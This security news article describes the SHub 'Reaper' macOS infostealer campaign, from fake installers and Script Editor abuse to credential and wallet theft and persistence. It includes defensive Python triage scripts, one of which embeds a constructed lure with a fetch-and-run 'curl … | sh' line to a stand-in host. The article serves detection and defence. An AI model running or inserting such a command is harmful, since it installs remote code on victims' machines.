Reaper Variant Of SHub Spoofs Apple Security Updates

The operators behind the SHub macOS infostealer have introduced a more sophisticated variant called "Reaper." This shows how macOS-focused malware keeps evolving, moving beyond basic credential theft into persistent, multi-stage compromise operations.

The latest campaign blends social engineering, trusted-brand impersonation, and stealthy persistence to get around the protections Apple recently added against ClickFix-style attacks. Researchers warn that this campaign is part of a larger trend: attackers increasingly use native Apple tools and legitimate system processes to evade detection.

Security researchers at SentinelOne discovered the new SHub Reaper variant while investigating malicious macOS installer campaigns. These campaigns masqueraded as legitimate software downloads. The attackers used fake installers for popular applications such as WeChat and Miro. They hosted these on typo-squatted domains that closely resembled real vendor infrastructure. Domains like "mlcrosoft[.]co[.]com" gave the false appearance of trusted Microsoft-hosted content.

Unlike earlier SHub campaigns that depended heavily on ClickFix-style Terminal execution tricks, the Reaper variant adopted a different infection strategy that bypasses Apple's newly introduced protections in macOS Tahoe 26.4. Apple added security prompts earlier this year to warn users when they attempt to paste potentially dangerous commands into Terminal, specifically targeting the growing abuse of ClickFix social engineering tactics.

The Reaper operators bypassed those safeguards by abusing the applescript:// URL scheme. Instead of tricking users into pasting commands into Terminal, the malware launches macOS Script Editor with a preloaded malicious AppleScript. The attackers obscured the payload by padding the script window with fake content and ASCII art. This kept the dangerous code hidden below the visible area of the editor. When victims clicked "Run," the malware silently executed hidden shell commands to download more payloads.
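To make the Script Editor trick concrete, here is an added Python example for triaging an applescript:// link of that kind. It is not code from SentinelOne's report or from PCrisk: the lure script and the URL are constructed, the query form (action=new&script=<percent-encoded source>) follows Script Editor's documented URL handler, and the 40-line "visible window" threshold is an assumption about how much of the editor a victim sees before scrolling.

```python
from urllib.parse import quote, unquote, urlparse

# Substrings that mean the script hands control to the shell or fetches
# remote content; extend the list for your environment.
SHELL_MARKERS = ("do shell script", "curl ", "base64", "osascript", "| sh", "| bash")

# Constructed lure (not taken from a real sample): a fake Apple update banner
# and a decoy dialog sit at the top of the editor window, rows of filler push
# the single dangerous statement far below the visible area.
BANNER = [
    "-- Apple Security Update: XProtectRemediator definitions",
    "-- Click Run to apply the update.",
    'display dialog "Installing security update..." buttons {"OK"}',
]
FILLER = ["--  " + "~" * (n % 9) for n in range(80)]           # ASCII-art style padding
PAYLOAD = ['do shell script "curl -fsSL https://example.invalid/stage2 | sh"']
SAMPLE_SCRIPT = "\n".join(BANNER + FILLER + PAYLOAD)

# Script Editor's URL handler takes the source in the script= parameter
# (applescript://com.apple.scripteditor?action=new&script=...); this URL is
# built here for the demo rather than copied from the campaign.
SAMPLE_URL = ("applescript://com.apple.scripteditor?action=new&script="
              + quote(SAMPLE_SCRIPT, safe=""))


def extract_script(url: str) -> str:
    """Return the AppleScript source carried by an applescript:// URL."""
    parsed = urlparse(url)
    if parsed.scheme != "applescript":
        raise ValueError("not an applescript:// URL")
    for field in parsed.query.split("&"):
        key, sep, value = field.partition("=")
        if sep and key == "script":
            # unquote() rather than parse_qs(): a '+' in AppleScript is a
            # literal operator, not an encoded space.
            return unquote(value)
    raise ValueError("URL carries no script= parameter")


def triage(url: str, visible_lines: int = 40) -> dict:
    """Locate shell hand-offs in the script and judge whether they would sit
    below the fold. visible_lines is an assumed editor window height."""
    lines = extract_script(url).splitlines()
    hits = [(n, line.strip()) for n, line in enumerate(lines, start=1)
            if any(marker in line.lower() for marker in SHELL_MARKERS)]
    first = hits[0][0] if hits else None
    return {
        "total_lines": len(lines),
        "shell_lines": hits,
        "first_shell_line": first,
        "hidden_below_fold": first is not None and first > visible_lines,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_URL)
    print(f"{report['total_lines']} lines, first shell hand-off on line "
          f"{report['first_shell_line']}, hidden below fold: {report['hidden_below_fold']}")
    for number, text in report["shell_lines"]:
        print(f"  {number}: {text}")
```

Run against a link recovered from a phishing page or a browser history entry, the report tells a responder in one line whether the script pads its way to a hidden `do shell script`, which is the tell of this campaign rather than of ordinary AppleScript automation.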

Researchers noted the malware deliberately impersonated multiple major technology brands at different stages of the attack. Victims first saw fake installers for legitimate productivity software. Payloads then came from Microsoft-themed infrastructure. During execution, victims received fake Apple security update messages. Later, persistence mechanisms were hidden in directories disguised as Google software update components. This rotating impersonation strategy made users more likely to trust system activity.

The malware specifically displayed fake update messages referencing Apple's XProtectRemediator, a legitimate macOS malware remediation utility. By mimicking authentic Apple security notifications, the attackers attempted to normalize suspicious system behavior and reduce the likelihood that victims would terminate the process.

Before deploying its main payload, Reaper checked its environment for analysis indicators and profiled victims, skipping devices using Russian-language settings or those likely in the Commonwealth of Independent States. This tactic is common in financially motivated malware.

The malicious websites hosting the fake installers also performed extensive browser fingerprinting and anti-analysis. JavaScript on the pages collected information about browser extensions, system hardware, location, and indicators of a virtual machine. The fingerprinting specifically checked for password manager extensions (such as 1Password, Bitwarden, and LastPass) and crypto wallet extensions (such as MetaMask and Phantom).

To hinder security researchers, the attackers used multiple anti-debugging and anti-analysis techniques. Malicious pages disrupted browser developer tools, disabled F12, and triggered debugger loops. If the malware detected that developer tools were open, the webpage displayed a Russian-language "Access Denied" message.

Once active on the victim system, Reaper focused heavily on credential theft and data exfiltration. The malware targeted browser data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, harvesting stored credentials, cookies, and session data. It also targeted cryptocurrency wallet applications, including Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite.

This campaign showed expanded capabilities compared to earlier SHub variants by adding document theft similar to Atomic macOS Stealer (AMOS). Reaper searched the Desktop and Documents directories for valuable files, including Microsoft Office documents, spreadsheets, wallet files, configuration data, and remote desktop connection files. The malware also collected image files and JSON-based data within certain size limits. This maximized valuable exfiltration while reducing operational noise.

Researchers found that the malware compressed stolen data into staged archives before uploading. It sent the contents in segmented chunks to its command-and-control infrastructure. Chunked uploads helped attackers transfer large datasets reliably. This approach avoided interruptions from network instability or upload size restrictions.

One of the campaign's most concerning features involved direct tampering with cryptocurrency wallet applications. Reaper searched infected systems for installed wallet software and replaced legitimate application components with trojanized versions downloaded from attacker-controlled infrastructure. It then stripped the com.apple.quarantine attribute from the modified bundles, so Gatekeeper would never evaluate them, and re-signed them ad hoc, so the tampered code still carried a valid (if untrusted) signature and launched without immediate security warnings.
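The two tampering steps leave a fingerprint that can be checked from the command line: an ad hoc signature has no Authority chain and reports `TeamIdentifier=not set`, and the bundle carries no quarantine attribute. The Python below is an added example (not from SentinelOne or PCrisk) that parses `codesign -dvv` output and an `xattr` listing for a wallet bundle and compares the team identifier against a baseline. Both sample outputs are constructed to mimic the real formats; the bundle path, identifier and team ID are placeholders.

```python
import re
import subprocess

# Constructed sample of `codesign -dvv` output for a Developer ID-signed app.
# Identifiers, team ID and paths are placeholders, not a real vendor's.
DEVID_OUTPUT = """\
Executable=/Applications/Wallet.app/Contents/MacOS/Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=4096 flags=0x10000(runtime) hashes=120+7 location=embedded
Signature size=8980
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
Runtime Version=14.0.0
Sealed Resources version=2 rules=13 files=210
Internal requirements count=1 size=176
"""

# Constructed: the same bundle after its components were swapped and it was
# re-signed with `codesign -f -s - Wallet.app` (ad hoc, no identity).
ADHOC_OUTPUT = """\
Executable=/Applications/Wallet.app/Contents/MacOS/Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=4096 flags=0x2(adhoc) hashes=120+7 location=embedded
Signature=adhoc
Info.plist entries=22
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=211
Internal requirements count=0 size=12
"""

FLAGS_RE = re.compile(r"flags=0x[0-9a-fA-F]+\(([^)]*)\)")


def parse_codesign(output: str) -> dict:
    """Turn codesign's key=value lines into a dict. Authority repeats, so it
    becomes a list (leaf certificate first); CodeDirectory flags are split out."""
    info = {"Authority": [], "flags": []}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Authority":
            info["Authority"].append(value)
        elif key.startswith("CodeDirectory"):
            match = FLAGS_RE.search(line)
            info["flags"] = match.group(1).split(",") if match else []
        else:
            info[key] = value
    return info


def assess(codesign_output: str, xattrs: list, expected_team=None) -> dict:
    """Flag the combination the campaign leaves behind: ad hoc signature, no
    team identity, and a quarantine attribute that is missing."""
    info = parse_codesign(codesign_output)
    adhoc = info.get("Signature") == "adhoc" or "adhoc" in info["flags"]
    team = info.get("TeamIdentifier", "not set")
    quarantined = "com.apple.quarantine" in xattrs
    findings = []
    if adhoc:
        findings.append("ad hoc signature: no certificate ties this code to a publisher")
    if not info["Authority"]:
        findings.append("no Authority chain")
    if team == "not set":
        findings.append("TeamIdentifier not set")
    elif expected_team and team != expected_team:
        findings.append(f"TeamIdentifier {team} differs from baseline {expected_team}")
    if adhoc and not quarantined:
        findings.append("ad hoc bundle without com.apple.quarantine: Gatekeeper never evaluated it")
    return {"adhoc": adhoc, "team": team, "quarantined": quarantined,
            "findings": findings, "suspicious": bool(findings)}


def collect(app_path: str) -> tuple:
    """macOS only: gather assess() inputs for a bundle on disk. codesign writes
    its report to stderr; xattr lists attribute names one per line."""
    cs = subprocess.run(["codesign", "-dvv", app_path], capture_output=True, text=True)
    xa = subprocess.run(["xattr", app_path], capture_output=True, text=True)
    return cs.stderr + cs.stdout, xa.stdout.split()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        output, attrs = collect(sys.argv[1])
        report = assess(output, attrs, expected_team=sys.argv[2] if len(sys.argv) > 2 else None)
    else:
        report = assess(ADHOC_OUTPUT, [])
    for finding in report["findings"]:
        print("-", finding)
```

Keeping a baseline of each wallet vendor's Team ID turns the check from "is this ad hoc?" into "is this still signed by who signed it at install time?", which also catches a replacement that was re-signed with some other, unrelated Developer ID.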

Not Just an Infostealer

Reaper established persistence beyond immediate data theft. It planted a LaunchAgent whose files sat in directories named to look like Google software update components. The agent ran a recurring background process that contacted attacker-controlled infrastructure every 60 seconds and waited for new instructions. Any payload the operators sent over the command-and-control channel was executed directly under the current user's privileges.
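The persistence described here, and the recommendation later in the article to watch for unusual LaunchAgent creation, can both be turned into a simple host check. The Python below is an added example (not from SentinelOne or PCrisk) that scores LaunchAgent plists on the traits this campaign combines: a vendor-sounding label, a beacon-short StartInterval, an interpreter as the launched program, a hidden file, and a program path outside where that vendor's real updater lives. Both plists are constructed; the "victim" path is a placeholder, and the Google updater location used as the baseline is an assumption to verify against a clean machine.

```python
import plistlib
from pathlib import Path

# Constructed plist modelled on the persistence described above: a label that
# reads like a Google updater, a 60-second beacon, and a shell one-liner living
# under a user-writable look-alike directory. Every path is a placeholder.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.google.keystone.update</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>/Users/victim/Library/Application Support/Google/GoogleUpdater/.agent</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
  <key>StandardOutPath</key><string>/dev/null</string>
  <key>StandardErrorPath</key><string>/dev/null</string>
</dict>
</plist>
"""

# Constructed benign counterpart: a vendor helper with a normal hourly check.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Example.app/Contents/Helpers/Updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/env",
                "/usr/bin/python3", "/usr/bin/perl"}
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")
# Assumed baseline for where Google's real updater agent lives inside a user
# profile; confirm it against a known-clean machine before relying on it.
VENDOR_HOMES = {"com.google.": "/Library/Google/GoogleSoftwareUpdate/"}
BEACON_SECONDS = 120   # at or under this looks like a C2 check-in, not an updater


def assess_agent(plist: dict) -> dict:
    """Score one parsed LaunchAgent/LaunchDaemon dictionary."""
    label = str(plist.get("Label", ""))
    args = list(plist.get("ProgramArguments") or [])
    if not args and "Program" in plist:
        args = [plist["Program"]]
    interval = plist.get("StartInterval")
    findings = []
    if isinstance(interval, int) and interval <= BEACON_SECONDS:
        findings.append(f"beacon-like StartInterval of {interval}s")
    if args and args[0] in INTERPRETERS:
        findings.append(f"launched through an interpreter ({args[0]})")
    if any("/." in a for a in args):
        findings.append("hidden (dot-prefixed) path in command line")
    if any(a.startswith(USER_WRITABLE) for a in args):
        findings.append("program lives in a user-writable location")
    for prefix, home in VENDOR_HOMES.items():
        if label.startswith(prefix) and not any(home in a for a in args):
            findings.append(f"label claims {prefix}* but program is outside {home}")
    return {"label": label, "args": args, "findings": findings,
            "suspicious": len(findings) >= 2}


def assess_bytes(raw: bytes) -> dict:
    """Convenience wrapper: parse a plist from bytes and score it."""
    return assess_agent(plistlib.loads(raw))


def scan_launch_agents(directory=None) -> list:
    """Run assess_agent() over every plist in a LaunchAgents directory
    (default: the current user's)."""
    directory = Path(directory) if directory else Path.home() / "Library" / "LaunchAgents"
    reports = []
    for path in sorted(directory.glob("*.plist")):
        try:
            report = assess_bytes(path.read_bytes())
        except Exception as exc:        # a plist launchd cannot parse is itself worth a look
            report = {"label": path.name, "args": [], "findings": [f"unparseable: {exc}"],
                      "suspicious": True}
        report["path"] = str(path)
        reports.append(report)
    return reports


if __name__ == "__main__":
    for report in scan_launch_agents():
        if report["suspicious"]:
            print(report["path"], report["label"])
            for finding in report["findings"]:
                print("   -", finding)
```

A single trait is weak evidence (plenty of legitimate agents use RunAtLoad, and some wrap a script in /bin/sh), so the verdict requires two or more. Point the same function at /Library/LaunchAgents and /Library/LaunchDaemons to cover system-wide persistence as well.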

This persistence mechanism transformed the malware from a traditional smash-and-grab infostealer into a longer-term access platform capable of supporting additional malicious activity. Security researchers warned that the backdoor functionality gave attackers opportunities to deploy secondary payloads, expand credential theft operations, or pivot deeper into enterprise environments after the initial compromise.

The emergence of Reaper highlights the rapid adaptation between operating system vendors and malware developers. Apple introduced new Terminal paste protections in macOS Tahoe 26.4 to stop ClickFix campaigns that used social engineering to trick users into running malicious commands. However, researchers saw attackers quickly move to Script Editor abuse and AppleScript flows. These methods sidestepped the new protections entirely.

The cybersecurity community increasingly warns that sophisticated macOS malware is undermining the belief that Apple systems are inherently secure.

Researchers recommend organizations monitor for suspicious AppleScript activity and unexpected Script Editor launches. They also urge watching for unusual LaunchAgent creations and outbound connections after script execution. Users should avoid downloading software from unverified domains and scrutinize any unexpected update prompts. This is especially important for prompts requesting manual script execution or password entry outside normal macOS update workflows.

The SHub Reaper campaign shows macOS attackers refining their social engineering and leveraging native Apple tools to remain effective despite new defenses. Instead of dropping conspicuous binaries, attackers abuse trusted workflows and familiar brand elements to blend malicious activity into normal system behavior.

Karolis Liucveikis

Experienced software engineer, passionate about behavioral analysis of malicious apps

Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
